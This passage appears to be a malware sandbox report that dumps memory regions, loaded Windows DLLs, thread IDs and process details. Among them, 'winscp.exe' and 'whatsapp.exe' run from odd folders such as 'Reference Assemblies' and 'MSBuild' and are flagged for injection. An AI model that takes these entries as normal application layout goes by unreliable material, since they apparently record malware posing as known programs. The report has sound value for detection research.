mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 1662 start_va = 0x7ff87d630000 end_va = 0x7ff87d6a9fff monitored = 0 entry_point = 0x7ff87d657630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1663 start_va = 0x7ff87db10000 end_va = 0x7ff87db45fff monitored = 0 entry_point = 0x7ff87db20070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1664 start_va = 0x7ff87e3f0000 end_va = 0x7ff87e401fff monitored = 0 entry_point = 0x7ff87e3f1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1665 start_va = 0x7ff87e430000 end_va = 0x7ff87e447fff monitored = 0 entry_point = 0x7ff87e435910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1666 start_va = 0x7ff87f380000 end_va = 0x7ff87f812fff monitored = 0 entry_point = 0x7ff87f38f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1667 start_va = 0x7ff87fd00000 end_va = 0x7ff87fd26fff monitored = 0 entry_point = 0x7ff87fd07940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1668 start_va = 0x7ff87fd50000 end_va = 0x7ff87fdf9fff monitored = 0 entry_point = 0x7ff87fd77910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1669 start_va = 0x7ff87fe00000 end_va = 0x7ff87fefffff monitored = 0 entry_point = 0x7ff87fe40f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1670 start_va = 0x7ff8802e0000 end_va = 0x7ff880303fff monitored = 0 entry_point = 0x7ff8802e3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1671 start_va = 0x7ff880480000 end_va = 0x7ff880573fff monitored = 0 entry_point = 0x7ff88048a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1672 start_va = 0x7ff8806f0000 end_va = 0x7ff8806fbfff monitored = 0 entry_point = 0x7ff8806f27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1673 start_va = 0x7ff8808f0000 end_va = 0x7ff880923fff monitored = 0 entry_point = 0x7ff88090ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1674 start_va = 0x7ff880930000 end_va = 0x7ff880939fff monitored = 0 entry_point = 0x7ff880931830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1675 start_va = 0x7ff880a40000 end_va = 0x7ff880a5efff monitored = 0 entry_point = 0x7ff880a45d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1676 start_va = 0x7ff880bb0000 end_va = 0x7ff880c0bfff monitored = 0 entry_point = 0x7ff880bc6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1677 start_va = 0x7ff880c60000 end_va = 0x7ff880c76fff monitored = 0 entry_point = 0x7ff880c679d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1678 start_va = 0x7ff880d80000 end_va = 0x7ff880d8afff monitored = 0 entry_point = 0x7ff880d819a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1679 start_va = 0x7ff881170000 end_va = 0x7ff881198fff monitored = 0 entry_point = 0x7ff881184530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1680 start_va = 0x7ff8811a0000 end_va = 0x7ff881238fff monitored = 0 entry_point = 0x7ff8811cf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1681 start_va = 0x7ff8812e0000 end_va = 0x7ff88132afff monitored = 0 entry_point = 0x7ff8812e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1682 start_va = 0x7ff881330000 end_va = 0x7ff88133efff monitored = 0 entry_point = 0x7ff881333210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1683 start_va = 0x7ff881340000 end_va = 0x7ff881353fff monitored = 0 entry_point = 0x7ff8813452e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1684 start_va = 0x7ff881360000 end_va = 0x7ff88136ffff monitored = 0 entry_point = 0x7ff8813656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1685 start_va = 0x7ff881370000 end_va = 0x7ff8813b2fff monitored = 0 entry_point = 0x7ff881384b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1686 start_va = 0x7ff881450000 end_va = 0x7ff881616fff monitored = 0 entry_point = 0x7ff8814adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1687 start_va = 0x7ff881620000 end_va = 0x7ff881c63fff monitored = 0 entry_point = 0x7ff8817e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1688 start_va = 0x7ff881c70000 end_va = 0x7ff881d24fff monitored = 0 entry_point = 0x7ff881cb22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1689 start_va = 0x7ff881d50000 end_va = 0x7ff881db9fff monitored = 0 entry_point = 0x7ff881d86d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1690 start_va = 0x7ff881e70000 end_va = 0x7ff881ec4fff monitored = 0 entry_point = 0x7ff881e87970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1691 start_va = 0x7ff881ed0000 end_va = 0x7ff8820b7fff monitored = 0 entry_point = 0x7ff881efba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1692 start_va = 0x7ff8820c0000 end_va = 0x7ff882215fff monitored = 0 entry_point = 0x7ff8820ca8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1693 start_va = 0x7ff882220000 end_va = 0x7ff8822bcfff monitored = 0 entry_point = 0x7ff8822278a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1694 start_va = 0x7ff8822c0000 end_va = 0x7ff88253cfff monitored = 0 entry_point = 0x7ff882394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1695 start_va = 0x7ff882550000 end_va = 0x7ff8825aafff monitored = 0 entry_point = 0x7ff8825638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1696 start_va = 0x7ff883b80000 end_va = 0x7ff883beafff monitored = 0 entry_point = 0x7ff883b990c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1697 start_va = 0x7ff883bf0000 end_va = 0x7ff883d0bfff monitored = 0 entry_point = 0x7ff883c302b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1698 start_va = 0x7ff8841b0000 end_va = 0x7ff884256fff monitored = 0 entry_point = 0x7ff8841bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1699 start_va = 0x7ff8842c0000 end_va = 0x7ff884402fff monitored = 0 entry_point = 0x7ff8842e8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1700 start_va = 0x7ff884410000 end_va = 0x7ff8844d0fff monitored = 0 entry_point = 0x7ff884430da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1701 start_va = 0x7ff884920000 end_va = 0x7ff8849c6fff monitored = 0 entry_point = 0x7ff8849358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1702 start_va = 0x7ff884a10000 end_va = 0x7ff884b95fff monitored = 0 entry_point = 0x7ff884a5ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1703 start_va = 0x7ff884ba0000 end_va = 0x7ff884ba7fff monitored = 0 entry_point = 0x7ff884ba1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1704 start_va = 0x7ff884bb0000 end_va = 0x7ff884c01fff monitored = 0 entry_point = 0x7ff884bbf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1705 start_va = 0x7ff884c10000 end_va = 0x7ff884cbcfff monitored = 0 entry_point = 0x7ff884c281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1706 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 84 os_tid = 0xbac Thread: id = 85 os_tid = 0x11a8 Thread: id = 86 os_tid = 0x101c Thread: id = 87 os_tid = 0x618 Thread: id = 88 os_tid = 0xaf4 Thread: id = 89 os_tid = 0x878 Thread: id = 90 os_tid = 0x820 Thread: id = 91 os_tid = 0x6e8 Thread: id = 92 os_tid = 0x6e4 Thread: id = 93 os_tid = 0x6c4 Thread: id = 94 os_tid = 0x614 Thread: id = 95 os_tid = 0x564 Thread: id = 96 os_tid = 0x560 Thread: id = 97 os_tid = 0x55c Thread: id = 98 os_tid = 0x558 Thread: id = 99 os_tid = 0x554 Thread: id = 100 os_tid = 0x54c Thread: id = 101 os_tid = 0x51c Thread: id = 102 os_tid = 0x460 Thread: id = 103 os_tid = 0x45c Thread: id = 104 os_tid = 0x458 Thread: id = 105 os_tid = 0x158 Thread: id = 106 os_tid = 0x2c8 Thread: id = 107 os_tid = 0x2ec Thread: id = 108 os_tid = 0x284 Thread: id = 109 os_tid = 0x140 Process: id = "11" image_name = "winscp.exe" filename = "c:\\program files (x86)\\reference assemblies\\winscp.exe" page_root = "0x5f706000" os_pid = "0x10f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\winscp.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1713 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1714 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1715 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1716 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1717 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1718 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1719 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1720 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1721 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1722 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1723 start_va = 0x2d0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1724 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1725 start_va = 0x2f0000 end_va = 0x2f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1726 start_va = 0x300000 end_va = 0x316fff monitored = 0 entry_point = 0x3014a1 region_type = mapped_file name = "winscp.exe" filename = "\\Program Files (x86)\\Reference Assemblies\\winscp.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\winscp.exe") Region: id = 1727 start_va = 0x320000 end_va = 0x3dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1728 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1729 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1730 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1731 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1732 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1733 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1734 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1735 start_va = 0x2190000 end_va = 0x2b53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 1736 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1737 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1738 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1739 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1740 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1741 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1742 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1743 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1744 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1745 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1746 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1747 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1748 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1749 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1750 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1751 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1752 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1753 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1754 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1755 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1756 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1757 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1758 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1759 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1760 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1761 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1763 start_va = 0x7a0000 end_va = 0x89dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Thread: id = 110 os_tid = 0x10fc Process: id = "12" image_name = "whatsapp.exe" filename = "c:\\program files (x86)\\msbuild\\whatsapp.exe" page_root = "0x5d510000" os_pid = "0x1100" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\whatsapp.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1764 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1765 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1766 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1767 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1768 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1769 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1770 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1771 start_va = 0x1b0000 end_va = 0x1c6fff monitored = 0 entry_point = 0x1b14a1 region_type = mapped_file name = "whatsapp.exe" filename = "\\Program Files (x86)\\MSBuild\\whatsapp.exe" (normalized: "c:\\program files (x86)\\msbuild\\whatsapp.exe") Region: id = 1772 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1773 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1774 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1775 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1776 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1777 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1778 start_va = 0x510000 end_va = 0x513fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1779 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1780 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1781 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1782 start_va = 0xa90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1783 start_va = 0x1e90000 end_va = 0x1f4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1784 start_va = 0x2020000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1785 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 1786 start_va = 0x2040000 end_va = 0x2a03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 1787 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1788 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1789 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1790 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = 